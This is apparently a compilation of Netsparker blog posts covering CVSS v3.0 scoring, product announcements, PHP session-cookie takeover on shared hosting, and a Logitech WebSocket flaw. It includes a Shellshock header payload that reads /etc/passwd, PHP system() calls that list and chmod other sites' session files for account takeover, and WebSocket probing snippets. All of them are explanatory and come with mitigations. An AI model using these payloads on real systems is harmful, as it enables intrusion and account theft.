The Common Vulnerability Scoring System (CVSS) was developed in 2005 to fix the lack of standardization in the industry. CVSS is an open, independent and large-scale vulnerability scoring system that categorizes vulnerabilities. By using CVSS to categorize and grade vulnerabilities, it became possible to produce a vector string and score, which can be used in other vulnerability management systems.

In this article, we take a closer look at the details of the current CVSS version 3.0, and provide examples of a few vulnerability assessments from a web application security perspective.

Characterizing Vulnerabilities

In CVSS v3, vulnerabilities are characterized under 3 metric groups:

  1. Base
  2. Temporal
  3. Environmental

Let's examine each by defining the additional metrics they use.

Base Score

Base metrics focus on the inherent qualities of a vulnerability that will not change in time, or depend on the environment.

The Base score has two subscores: Exploitability and Impact. As we analyze the Base metric group, we can also consider two virtual categories: the Vulnerable Component and the Impacted Component. The Scope value states whether the Vulnerable and Impacted Components are the same or not; in other words, it defines whether a vulnerability in one part of the system can affect other parts, by allowing the attacker to escape the scope of the vulnerable component and reach the rest of the system.

Leaving aside the exceptional situations listed below, Vulnerable Component and Impacted Component are the same. The exceptions are:

  • XSS vulnerability in a web application: Even though the web application would technically be the vulnerable component in this case, the browser is evaluated as an Impacted Component. This is because the confidentiality, integrity and availability of the browser will be impacted, since the XSS vulnerability will allow the attacker to steal private information and execute scripting code on the browser.
  • Sandbox escape: A sandbox is an isolated environment in which we run applications so that, if they are compromised, the damage cannot spread to the rest of the system. If an attacker escapes the sandbox, the impacted components lie outside the vulnerable, sandboxed component.

Outside these two virtual categories, CVSS v3 handles the Base Score in two categories: Exploitability and Impact. While Exploitability grades how easy the vulnerability is to exploit and which tools or conditions are needed, Impact defines the consequences of a successful exploit. Each is outlined below.

Exploitability Metrics

Exploitability metrics define the simplicity of exploiting the vulnerable component.

Attack Vector (AV): Where the Attack Originates From

Network (N): The Vulnerable Component may be exploited remotely, over the network.
Adjacent Network (A): The Vulnerable Component may be exploited from the same physical or logical network.
Local (L): The Vulnerable component may be exploited from a local authorized session, without the need of a network.

Physical (P): The Vulnerable component may be exploited only through physical access to the component. This attack vector was introduced in CVSS v3.

Attack Complexity (AC): Skills Required

Low (L): The vulnerability may be exploited with no additional skills.
High (H): The vulnerability may be exploited with additional tools, conditions and skills.

Privileges Required (PR)

This metric was named 'Authentication (AU)' in CVSS v2 and it defines the necessity of privileges in order to exploit a vulnerability.

None (N): The attacker does not need any privileges to exploit the vulnerability.
Low (L): The attacker is required to have basic privileges in a system to exploit the vulnerability.
High (H): The attacker has to have higher privileges in a system to exploit the vulnerability. The necessity of higher privileges might seem contradictory but the vulnerable component and impacted component might be different.

User Interaction (UI)

None (N): The vulnerability may be exploited without the need for a user interaction.
Required (R): The vulnerability may be exploited if the user takes some action. For example, for the successful exploitation of a CSRF attack, the attacker should induce the victim to click on an external link or visit a certain webpage.

Scope (S)

This metric defines whether the Vulnerable Component and the Impacted Component are the same or not.

Unchanged (U): The Vulnerable Component and the Impacted Component are the same.
Changed (C): The Vulnerable Component and the Impacted Component are different. For instance, as stated in the XSS example we gave above, the vulnerable component is the web application, and the impacted component is the web browser.

Impact Metrics

The Impacted Component is evaluated based on the damage the attack might do to confidentiality (C), integrity (I), and availability (A).

Confidentiality (C)

This metric measures the impact of the exploited vulnerability on the confidentiality of the information within the system.

High (H): A large portion of the resources in the system can be acquired on exploitation of the vulnerability.
Low (L): A small portion of the resources in the system can be acquired on exploitation of the vulnerability.
None (N): The confidentiality of the resources in the system is not lost on exploitation of the vulnerability.

Integrity (I)

This metric measures the impact of the vulnerability exploit on the integrity and veracity of the resources.

High (H): All components can be modified or lost due to the vulnerability.
Low (L): Data can be modified but will not have a severe effect on the impacted component. The attacker does not have control over the consequences of the data modification.
None (N): There’s no loss of protection on the impacted component.

Availability Impact (A)

This metric measures the accessibility to the impacted component after the successful exploit of a vulnerability.

High (H): The access to the system is entirely denied, or there might be some loss of availability that heavily affects the Impacted Component.
Low (L): The access to the system isn’t completely denied but there are partial denials.
None (N): The system is not affected in terms of accessibility.

Temporal Score

Temporal metrics measure the current state of exploitation techniques and the availability of fixes, both of which change over time. For example, if a patch is released, the Temporal Score of the vulnerability will decrease. If a new method of exploiting the vulnerability is discovered, the score will increase. The Temporal Score also depends on how the vulnerability is reported: the confidence in the information found within these reports will affect the overall Temporal Score.

As indicated in the metric values below, unlike the Base Score, the Temporal Score changes over time.

Exploit Code Maturity (E)

The Exploit Code Maturity metric measures the probability of exploiting the vulnerability.

Not Defined (X): This will not change the score. It means that the metric is skipped from the scoring.
High (H): No exploit is required, or an effective exploit code is delivered autonomously.
Functional (F): Exploit codes are available. Exploitation of the vulnerability can be repeated using these codes.
Proof-of-Concept (P): Proof-of-concept exploit code is available, but exploiting the vulnerability isn't straightforward on most systems and requires additional modifications by the attacker.
Unproven (U): No exploit codes are available.

Remediation Level (RL)

This metric measures the availability of remedial actions for a vulnerability. Generally, vulnerabilities are unpatched when they are initially disclosed.

Not Defined (X): This will not change the score. It means that the metric is skipped from the scoring.
Unavailable (U): There is no solution available.
Workaround (W): There are unofficial methods of patching the vulnerability.
Temporary Fix (T): There is an official but temporary solution.
Official Fix (O): There’s a solution released by the vendor.

Report Confidence (RC)

The Report Confidence metric measures the amount of details in the vulnerability report and their credibility.

Not Defined (X): This will not change the score. It means that the metric is skipped from the scoring.

Confirmed (C): The vendor has confirmed the existence of the vulnerability or the public functional exploit. There are detailed reports to verify the research of the vulnerability.
Reasonable (R): There are important details available, but the source code isn’t open to public access, so the research cannot be verified.
Unknown (U): The report only states that the vulnerability exists. Causes or effects are not reported.

Environmental Score

Generally, Base and Temporal scores are used by people such as security analysts and developers who are familiar with the vulnerability's characteristics. Environmental scores, on the other hand, are used by end-user organizations to evaluate the effects of the vulnerability in their own environmental context.1

Environmental scores measure the impact of the vulnerability characteristics, defined with the Base score on the given context, such as an organization’s department.

For example, normally when the Base score is calculated, Confidentiality, Integrity, and Availability are three independent, equal values.2 However in some situations or systems, Availability might be far more important than the others. In that case, the value of Availability in the score can be assigned a greater factor.

Another example: even if exploiting a vulnerability normally requires authorization, a particular environment might not enforce it. In that case, the Privileges Required metric can be given the value None, increasing the overall score of the vulnerability.

Calculation

The JavaScript library published on the FIRST website can be used to calculate CVSS v3 scores.3

Calculating Base Scores

First the Impact Subscore Base (ISC Base) value is calculated:

ISCBase = 1 - ((1−ImpactConf) × (1−ImpactInteg) × (1−ImpactAvail))

Next, depending on whether the scope changes or not, Impact Subscore (ISC) is calculated with two different methods:

 // Calculate ISC
if(Scope=="U") {  // U=Unchanged
  ISC = 6.42 * ISCBase;
} else {
  ISC = 7.52 * (ISCBase-0.029)-3.25*Math.pow((ISCBase-0.02), 15);
}

Then the Exploitability Subscore (ESC) is calculated:

ESC = 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

After calculating ISC and ESC, it's time to calculate the Base Score.

If the ISC value is 0 or less, the Base Score is 0, too. Otherwise, the following code applies:

if(ISC<=0) {
  BaseScore = 0;
} else {
  if($("#S").val()=="U") {
    BaseScore = roundUp1(Math.min((ISC+ESC), 10));
  } else {
    BaseScore = roundUp1(Math.min((1.08*(ISC+ESC)), 10));
  }
}

The roundUp1 function should catch your attention. Here’s the description of it in the specifications:

function roundUp1(d) {
 return Math.ceil (d * 10) / 10;
}

After finding the Base Score, we can calculate Temporal Score with the following formula:

Round up(BaseScore × ExploitCodeMaturity × RemediationLevel × ReportConfidence)

CVSS Vector String

CVSS vector strings are the textual representations of CVSS scores. They are a useful way to present and store CVSS scores. A CVSS vector string begins with the label CVSS, followed by the numeric CVSS version used in the scoring; after that come the forward-slash-separated (/) metrics and their values.

The metrics can be specified in any order in a vector string. However, the preferred order is given in the table below.

Another rule is that the Base metrics must be present in the string, while including Temporal and Environmental metrics depends on the preference of the user.

The optional group metrics not specified in the CVSS vector string will be considered as Not Defined (X). The metrics that are specifically given the Not Defined (X) value do not have to appear in the CVSS vector string.

For example:

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

In the vector string above, where Temporal and Environmental metric groups aren’t set, the following metrics and values are given:

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: High
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: Low
  • Integrity: Low
  • Availability: None

Every Temporal and Environmental metric not stated above will be considered as Not Defined (X).

For example:

CVSS:3.0/S:U/AV:N/AC:L/PR:H/UI:N/C:L/I:L/A:N/E:F/RL:X

In this example, Exploit Code Maturity (E) is given the Functional (F) value, and the Remediation Level (RL) is given the Not Defined (X) value. The metric values do not have to be listed in any particular order.

Example Score Calculation

We can demonstrate a sample score calculation for a vulnerability using CVSS v3.0. The GNU Bourne-Again Shell (Bash) 'Shellshock' vulnerability (CVE-2014-6271), which affected many Linux-based servers in 2014, is ideal as an example.4

Before we begin, it's useful to refresh our memories on what the vulnerability was. Apache servers running in CGI mode turn request headers into environment variables, storing each header's value in the corresponding variable.

Shellshock is a security bug that causes Bash to unintentionally execute commands appended to a function definition stored in an environment variable. In other words, if exploited, this vulnerability allows the attacker to remotely issue commands on the server, which is also known as remote code execution.
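
For illustration only, a typical probe abuses the fact that request headers end up in environment variables passed to Bash. The target path and command below are generic placeholders based on the well-known payload pattern, not a specific exploit:

GET /cgi-bin/status.cgi HTTP/1.1
Host: victim.example
User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd
Accept: */*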

Read more about the Shellshock vulnerability in our blogpost Shellshock Bash Remote Code Execution Vulnerability Explained and How to Detect It.

Attack Vector: Network

In this case, the vulnerability may be exploited by the attacker over the network. The vulnerable component in this attack is a web server.

Attack Complexity: Low

In this case, the vulnerability may be exploited with no additional skills. The attacker can exploit it in any situation where the HTTP request can be crafted manually, which is possible even with simple, freely available HTTP clients.

Privileges Required: None

The attacker does not need any privileges to exploit the vulnerability.

User Interaction: None

The vulnerability may be exploited without the need for any user interaction, using an HTTP request crafted specifically for the exploit.

Scope: Unchanged

Scope doesn’t change because the vulnerability is caused by Bash and all the impact is on the Bash shell.

Confidentiality, Integrity, and Availability Impact: High

Since the attacker can take full control of the system through Bash, confidentiality, integrity and availability are all at high risk.

CVSS v3.0 Base Score: 9.8
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
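
Plugging the CVSS v3.0 metric weights from the specification into the formulas above reproduces this score. The snippet below is just a self-contained check of the arithmetic, not the official calculator:

// CVSS v3.0 weights for the Shellshock vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
var AV = 0.85, AC = 0.77, PR = 0.85, UI = 0.85;   // exploitability weights
var C = 0.56, I = 0.56, A = 0.56;                 // impact weights (High)

function roundUp1(d) { return Math.ceil(d * 10) / 10; }

var ISCBase = 1 - ((1 - C) * (1 - I) * (1 - A));  // 0.9148...
var ISC = 6.42 * ISCBase;                         // scope unchanged: 5.8731...
var ESC = 8.22 * AV * AC * PR * UI;               // 3.8870...

var BaseScore = ISC <= 0 ? 0 : roundUp1(Math.min(ISC + ESC, 10));
console.log(BaseScore);                           // 9.8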

Netsparker and CVSS

Netsparker added CVSS to vulnerability reports in the version released in October 2016. Netsparker scores all the vulnerabilities it checks on the Base and Temporal metrics. The user can configure the Environmental metrics by adjusting the Report Policy settings. CVSS values, CVSS vector strings and the severity scores are all listed in the reports, alongside the vulnerability classifications.

Authors, Netsparker Security Researchers:

Ziyahan Albeniz
Sven Morgenroth
Umran Yildirimkaya

--------------------

1 https://www.first.org/cvss/specification-document
2 Please view the Metric Values table.
3 https://www.first.org/cvss/use-design
4 https://www.cvedetails.com/cve-details.php?t=1&cve_id=2014-6271

Netsparker Announces New FogBugz Issue Synchronization Feature

Netsparker is pleased to announce a new integration solution for the Netsparker Enterprise product. You can now detect any status changes in your FogBugz (Manuscript) cases in Netsparker Enterprise and vice versa.

FogBugz Logo

What is FogBugz (Manuscript) Issue Synchronization?

Netsparker Enterprise already supports out-of-the-box integration with FogBugz (Manuscript), as well as with other issue tracking systems. This means that you can now resolve and reactivate FogBugz (Manuscript) cases according to the scan results, in addition to automatic case creation, and detect any status changes in FogBugz (Manuscript) cases opened by Netsparker Enterprise.

How FogBugz (Manuscript) Issue Synchronization Works

When Netsparker Enterprise issues are marked as Fixed, their counterparts in FogBugz (Manuscript) are automatically marked with the Resolved default status. Likewise, when Netsparker Enterprise issues are revived, their counterparts in Fogbugz (Manuscript) are marked with the Reactivated default status.

Netsparker Enterprise generates a webhook URL after you save your integration settings. When you register this link as a webhook in your FogBugz (Manuscript) project, Netsparker Enterprise will be able to detect changes in your FogBugz (Manuscript) cases.

For further information, see FogBugz (Manuscript) Issue Synchronization and Integrating Netsparker Enterprise with an Issue Tracking System.


Netsparker Announces New JIRA Issue Synchronization Feature

Netsparker is pleased to announce a new integration feature for the Netsparker Enterprise product. You can now detect any status changes in your JIRA issues in Netsparker Enterprise and vice versa.

What is JIRA Issue Synchronization?

Netsparker Enterprise already supports out of the box integration with JIRA, as well as with other issue tracking systems. This means that you can now resolve and reopen JIRA issues according to the scan results, in addition to automatic issue creation, and detect any status changes in JIRA issues opened by Netsparker Enterprise.

How JIRA Issue Synchronization Works

When Netsparker Enterprise issues are marked as Fixed, their counterparts in JIRA are automatically marked with the user-provided Resolved status. Likewise, when Netsparker Enterprise issues are revived, their counterparts in JIRA are marked with the user-provided Reopened status.

Netsparker Enterprise generates a Webhook URL after you save your integration settings. When you register this link as a webhook in your JIRA Project, Netsparker Enterprise will be able to detect changes in your JIRA issues and compare them with the user-provided Reopen and Resolved statuses.

For further information, see JIRA Issue Synchronization and Integrating Netsparker Enterprise with an Issue Tracking System.

January 2019 Update for Netsparker Enterprise

We're delighted to announce a Netsparker Enterprise update. The highlights of this update are the addition of a new Application and Service Discovery feature, JIRA Issue Synchronization, FogBugz (Manuscript) Issue Synchronization, GitLab CI Integration, Azure DevOps Integration, Support for Advanced Scheduling Scenarios, a Jenkins Integration Script Generator for Pipeline Scripts, and security check updates similar to those just released in Netsparker Standard 5.2.

This announcement highlights what is new and improved in this latest update.

Application and Service Discovery

As a Netsparker Enterprise customer, you may have many targets to scan. You may not even have a complete list of targets. This feature enables you to become aware of the full scope of your online assets. Netsparker Enterprise will use several sources and methods (Rapid7's Sonar data and certificate transparency logs, for example) to discover additional, potential target applications and services.

For further information, see Application & Service Discovery.

Jira Issue Synchronization

Netsparker Enterprise now has out of box support for resolving and reactivating JIRA issues according to the scan results, in addition to automatic issue creation. Netsparker Enterprise also offers webhook support. This enables you to detect any status changes in JIRA issues opened by Netsparker Enterprise.

For further information, see JIRA Issue Synchronization.

FogBugz (Manuscript) Issue Synchronization

FogBugz Logo

Netsparker Enterprise now has out of box support for resolving and reactivating FogBugz (Manuscript) cases according to the scan results, in addition to automatic case creation. Netsparker Enterprise also offers webhook support. This enables you to detect any status changes in FogBugz (Manuscript) cases opened by Netsparker Enterprise.

For further information, see FogBugz (Manuscript) Issue Synchronization.

GitLab CI Integration

This integration enables you to integrate Netsparker Enterprise with GitLab. You will now be able to generate and use cURL and PowerShell scripts to enable Netsparker Enterprise's advanced integration functionality. This means you can automatically trigger security scans in GitLab's CI/CD pipeline and benefit from SDLC features.

For further information, see Integrating Netsparker Enterprise with GitLab.

Azure DevOps Integration

This integration enables you to integrate Netsparker Enterprise with Azure DevOps. You will be able to generate and use cURL and PowerShell scripts to enable Netsparker Enterprise's advanced integration functionality. This means you can automatically trigger security scans in Azure DevOps' CI/CD pipeline and benefit from SDLC features.

For further information, see Integration Netsparker Enterprise with Azure Pipelines.

Jenkins Integration Script Generator for Pipeline Scripts

Jenkins integration enables you to build automation into your projects. We have added an Integration Script Generator for the Pipeline Script to the Jenkins Integration window.

For further information, see Installing and Configuring the Netsparker Enterprise Jenkins Plugin.

Support for Advanced Scheduling Scenarios

This feature improves the scheduling options for scheduled scans to support advanced scenarios. For example, it is now possible to configure recurring scans to run bi-weekly or on specified days. There have been many requests about this in our support tickets, so we have responded to customer needs and provided these more advanced scheduling options.

For further information, see Scheduling Scans.

New Security Checks

We have added several new security checks to our Default Security Checks list in Scan Policies:

  • Added fourteen new kinds of Out-of-date version detection
  • Added a new pattern for CherryPy Version Disclosure and CherryPy Stack Trace Disclosure detection

For further information, see Scan Policies and our full list of Security Checks in our Web Application Vulnerabilities Index.

Further Information

For a complete list of what is new, improved and fixed in this update, refer to the Netsparker Enterprise changelog and Netsparker Standard changelog.

Cross Site Cookie Manipulation

For years, we’ve been told to keep the values of sensitive session cookies unpredictable and complex in order to prevent attacks such as session enumeration. And, it made sense. If the session ID is complex, long and cryptographically secure, it's almost impossible for an attacker to guess it.

Cross Site Cookie Manipulation

However, from time to time it's a good idea to look at recommended and widely followed security practices and ask yourself: "Is this actually the most secure way to do things?" and "Is it enough?". You'd be surprised how often the answer is no. In this blog post, we discuss the security of PHP's session cookies in a shared hosting environment, and explain why a cryptographically secure, random session ID is not enough to prevent attacks.

What Changed My Mind About Cookie Security

For years, I hadn't thought much about whether random session variable values were enough to protect against session cookie attacks. Then I read a blog post by a security professional, which focuses on a Russian hacker called Alexsey Belan who hacked dozens of sites including Yahoo!. The author, Chris McNab, describes Belan's techniques in great detail. Before Belan rose to questionable fame as one of the FBI's most wanted cyber criminals, McNab and his colleague, Mike Arpaia, were tasked with investigating a security breach. After the two spent a week analyzing the servers, and forensic artefacts left behind by the attacker, they came to the conclusion that a hacker called 'M4g' was responsible for the breach. As it turns out this was one of Belan's many online aliases.

The entire Alexsey's TTPs article is a must-read (link at the bottom), but it was the description of one of the many clever techniques he used that grabbed my attention:

Cookies from weak non-production instances (e.g. staging) were valid in production as cryptographic materials were the same — bypassing 2FA.

I suspect this means that he could authenticate to a less secure development instance of the live website as an administrative user, copy the cookie that was generated during authentication and use it to authenticate against the live production website. I can't decide whether this is an extremely clever trick or just bad software design! It's probably a little bit of both.

It got me thinking. The cookies were most likely cryptographically secure from the outside. The problem was that once he hacked a lower-level target, namely the staging server, he could easily hack the production application, as they seemed to have shared the same secret. I was inspired to take this further and thought about an attack on PHP (and possibly other languages or frameworks that store session information in a similar way) when it runs on a shared host.

So why was I prompted to think about PHP and shared hosting environments? At this point, it would be useful to remind ourselves of how PHP handles cookies.

Cookies in Session Management

You may know that HTTP is a stateless protocol. It needs a mechanism like HTTP cookies in order to manage and differentiate users. Using cookies, servers can identify the users that make requests and grant them the necessary access.

As the name suggests, client-side technologies like browsers are under the user's control, and they are what stores and sends cookies. Therefore, instead of leaving sensitive data in the browser, where it can be read and modified, most developers – and PHP – leave a unique, identifiable key in the browser and establish communication with the server using that key.

This is similar to what might happen when you visit a government agency. You show your ID to an employee, proving that you are the person you say you are. The employee knows he can safely talk to you about that unpaid parking ticket from three weeks ago, without giving out any sensitive information to an unintended recipient. But, while most people wouldn't have a problem with a stranger paying their parking tickets, the situation is clearly different when it comes to your personal email, online banking or social media accounts. This is why we have cookies, and why they do exactly what they are supposed to do, if used correctly.

In a similar way, whenever a user makes a request, a session ID is sent along with it. PHP finds the session related to this cookie and initializes a session object containing sensitive data, such as your email address or account balance, which allows the website to manage the user's session.

If you want to find out about PHP's session management, take a look at php.ini, PHP's main configuration file. By default, the cookie that holds the session ID is called PHPSESSID, as illustrated.

You can also see where the sessions are saved by looking at the session.save_path configuration option.

How the Session Management Feature Initializes in PHP

PHP won't start a new session by default. Instead, the developer needs to call session_start in order for PHP to read the PHPSESSID cookie and initialize the session with its value. There is also a php.ini configuration option called session.auto_start, which starts the session automatically, but it is not activated by default. So, to enable session management, you have to call the session_start function. With the default configuration, as seen above, this function call has the following effect.

  1. PHP tries to find a session file in the /var/lib/php5 directory whose filename contains the value of the PHPSESSID cookie. If it finds the file, PHP initializes an array from its contents and puts it into the superglobal $_SESSION variable.
  2. If the file does not exist, it creates a new one. The filename consists of the prefix sess_ and the value in the PHPSESSID cookie.

This is how information is stored in session files:

<?php
session_start();
if(authenticate($user, $pass)) {
$_SESSION["loggedIn"] = "yes";
$_SESSION["last_login"] = date("Y-m-d H:i:s");
} else {
echo "Try again!";
}

For this code, the $_SESSION values are serialized and written to the session file. Here is the output of the session file.

For a more readable output, you can use this code:

<?php
session_start();
var_dump($_SESSION);

This is the output of the code above:

array(2) { ["loggedIn"]=> string(3) "yes" ["last_login"]=> string(19) "2016-02-19 13:48:20" }

The Attack on Cookies in Shared Hosting Websites

Let's see how we can attack this issue in a shared hosting environment. In this example, there are two sites: fvvitter.com and qoogie.com. The first website, fvvitter.com, is under my control; qoogie.com belongs to someone else. But, both websites are on the same server because of shared hosting.

I began to investigate which session files are saved to which directory and what permissions are needed to access them.

<?php
system("ls -ld /var/lib/php5");

I immediately gained access to the names of the session files in the directory. You may remember that the filenames contained the actual session ID. That means I could create a cookie called PHPSESSID, put the ID from one of the filenames into the cookie, and visit qoogie.com. This was enough for me to take over the account of the person that owned this ID.

However, mere luck may not always be sufficient. On other shared hosting websites, you may run into strict directory permissions which don't even let you list the items within the directory. That doesn’t necessarily mean you can’t proceed. Even though you cannot access the list of items in the directory, you can still take over an account. This is how I was able to do that.

Both qoogie.com and fvvitter.com run on the same system. Let's say an online shop like OpenCart is installed on each domain. That means they use the same session structure; in other words, they save the same values with the same names inside the session array in order to check whether a user is authenticated.

If I can manage to login into fvvitter.com's Opencart instance as an administrator, I can use the same cookie on qoogie.com.

The strict permissions were in my way again, as qoogie.com couldn't access the session file that my Opencart instance generated. That didn't matter though, since I owned the file, and I could give everyone read and write permissions.

Here’s the code to make the appropriate changes, if the session ID was a92q1u6m6grgeco1glv8eip8i3:

<?php
system("chmod 777 /var/lib/php5/sess_a92q1u6m6grgeco1glv8eip8i3");
// check permissions
system("ls -ld  /var/lib/php5/sess_a92q1u6m6grgeco1glv8eip8i3");

This did the trick. When I tried to load qoogie.com using fvvitter.com's cookie, I was able to manipulate session handling of the site and bypass the necessary authentication.

How to Prevent Cross Site Cookie Manipulation

If you have multiple websites on your server, you need to prevent an attacker from reading the names of your session files. You can do this by setting the appropriate permissions. However, an attacker may still be able to use cookies generated by another website on the same server in order to take over an account. Therefore, it's important to store the session files of each site in a separate location. You can use the session.save_path configuration option to select an appropriate folder.
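
For example, on an Apache server running mod_php, each virtual host could be given its own session directory (the host names and paths below are just placeholders); the same setting can also be made in each site's own php.ini or pool configuration:

<VirtualHost *:80>
    ServerName qoogie.com
    DocumentRoot /var/www/qoogie
    # Sessions for this site only; keep the directory unreadable to other system users
    php_admin_value session.save_path "/var/lib/php5/sessions-qoogie"
</VirtualHost>

<VirtualHost *:80>
    ServerName fvvitter.com
    DocumentRoot /var/www/fvvitter
    php_admin_value session.save_path "/var/lib/php5/sessions-fvvitter"
</VirtualHost>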

Further Reading

Alexsey's TTPs
Cross Domain Cookie Manipulation 1 (Video)
Cross Domain Cookie Manipulation 2 (Video)

Remote Hardware Takeover via Vulnerable Admin Software

Increased digitization means that web browsers are integral to our daily lives. For example, I’m writing this article on a cloud-based word processing application, whereas a few years ago, I may only have had the option of using an executable desktop application. This growing capability means that the web will be a part of a broader attack scope in upcoming years. It’s safe to say that web security is no longer confined to web applications.

Taking Remote Control of Computer Hardware

A few weeks ago, we published a blog post about the study of researchers from Princeton and UC Berkeley on web based attacks, Discovering and Hacking IoT Devices Using Web-Based Attacks. This article focuses instead on new research on the potential vulnerabilities in web-based device configuration interfaces.

This week, we explore a study conducted by Tavis Ormandy from Google Project Zero on taking control of users' mice remotely through a WebSocket. In his research, Ormandy noticed that he had to download a 144MB program called Logitech Options in order to add a new function to his Logitech mouse. He realized that the program registered itself under the Windows Registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and was therefore set to run automatically when the computer started.

The program was not only an Electron application, but it also started a WebSocket server. Since the Origin header wasn't checked during the handshake, a connection to the WebSocket was possible from any website that the user visited.

x = new WebSocket("ws://localhost:10134");
x.onmessage = function(event) {console.log("message", event.data); };
x.onopen = function(event) { console.log("open", event); };

Discovering the Lack of a Control Mechanism

On further analysis of the program, Ormandy discovered that it expected JSON data, yet there was no rule or control mechanism enforcing that the data was actually sent in a valid JSON format. When unexpected data was received, the app crashed. Here's an example of an unexpected string input:

socket.send(JSON.stringify({message_type: "tool_update", session_id: "00cd8431-8e8b-a7e0-8122-9aaf4d7c2a9b", tool_id: "hello", tool_options: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" }))

Ormandy realized that tool_options expected an array value. He also found, in Logitech's GitHub repository, details of the communication protocol used by the program.

The only user authentication that the program used was a process ID (pid) belonging to the user. At first sight, this might seem like a good precaution to slow down attackers. However, Ormandy used a brute-force attack to bypass this precaution and obtained a valid pid. After this authentication bypass, an attacker could change any configuration option and send commands.

WebSocket is one of the most important features of HTML5. Any website can make a WebSocket request to another resource. This request may include values stored in the browser, such as HTTP cookies. WebSocket Hijacking attacks abuse this feature in order to send and receive messages on behalf of the victim.

How to Prevent the Remote Control Attack

The most important part in all of this is that during the handshake, before a connection is established, the Origin value in the request isn't taken into consideration. Tavis Ormandy suggests that Logitech could have whitelisted allowed origins and checked the Origin value of incoming WebSocket requests against that list.

Although HTTP and WebSocket are different protocols, the WebSocket handshake itself is an ordinary HTTP request, so the same kind of origin check can be applied there. Here's an example of a request that initiates a WebSocket connection:

GET / HTTP/1.1
Host: localhost:10134
Connection: Upgrade
Sec-WebSocket-Version: 13
Origin: https://www.whitelist.me
Sec-WebSocket-Key: XXXXXXXXXXXXXXXXXXXXXXX

By checking the origin in this request, the websocket server can easily decide whether it should block the connection attempt or grant it.
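
As a hedged sketch of what such a check could look like on the server side (this uses the popular Node.js ws package and a placeholder whitelist, not Logitech's actual code), the handshake can be rejected unless the Origin header is on a whitelist:

const WebSocket = require("ws");

const ALLOWED_ORIGINS = ["https://www.whitelist.me"];  // placeholder whitelist

const server = new WebSocket.Server({
    port: 10134,
    // verifyClient runs during the handshake, before the connection is accepted
    verifyClient: (info) => ALLOWED_ORIGINS.includes(info.origin)
});

server.on("connection", (socket) => {
    socket.on("message", (message) => {
        // Only connections from whitelisted origins ever reach this point
        console.log("received:", message.toString());
    });
});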

Importance of the Content Security Policy Header

One way to make sure that your website isn't abused to carry out such an attack is to implement a proper Content Security Policy (CSP). First and foremost, it will block Cross-site Scripting (XSS) if implemented correctly. However, it also lets you define which WebSocket endpoints your website is allowed to connect to, as seen below.

Content-Security-Policy: connect-src 'self' trusted-partner.com:8080;

However, please keep in mind that this will only prevent your own website from being abused for such an attack. An attacker could use any website for that matter, including his own. So fixing the vulnerability on the affected device is the only effective way to prevent the attack.

What's the Upshot?

The vulnerability reported by Ormandy on September 12 wasn't given a proper response within Project Zero's default 90-day window, within which vendors are expected to respond to and fix reported vulnerabilities. This is why he shared the vulnerability with the public. Soon after he did this, Logitech employees responded. In the meantime, he suggests that you disable Logitech Options until the vulnerability is fixed.

For further information, see "Options" Craft WebSocket server has no authentication.

Netsparker Will Be Exhibiting at the RSA Conference 2019 in San Francisco

This year Netsparker will be exhibiting at the RSA Conference in San Francisco, USA. The event will be held from March 4 to 8 at the Moscone Center. This year's theme is 'Better'.

Netsparker Will Be Exhibiting at the RSA Conference 2019 in San Francisco

Join Us at Booth #5580 in the North Expo at RSA Conference 2019

Members of our team will be representing Netsparker at booth #5580 in the North Expo. We’ll be happy to chat with you and answer any questions you might have about automatically detecting vulnerabilities in your website and web applications.

Visit the RSA Conference website for a copy of the agenda and more information about the sessions and events.

We look forward to meeting you there!

Register for a Free Expo Plus Pass at RSA Conference 2019

Use the code XEU9NETSPRKR to register for a complimentary Expo Plus Pass.
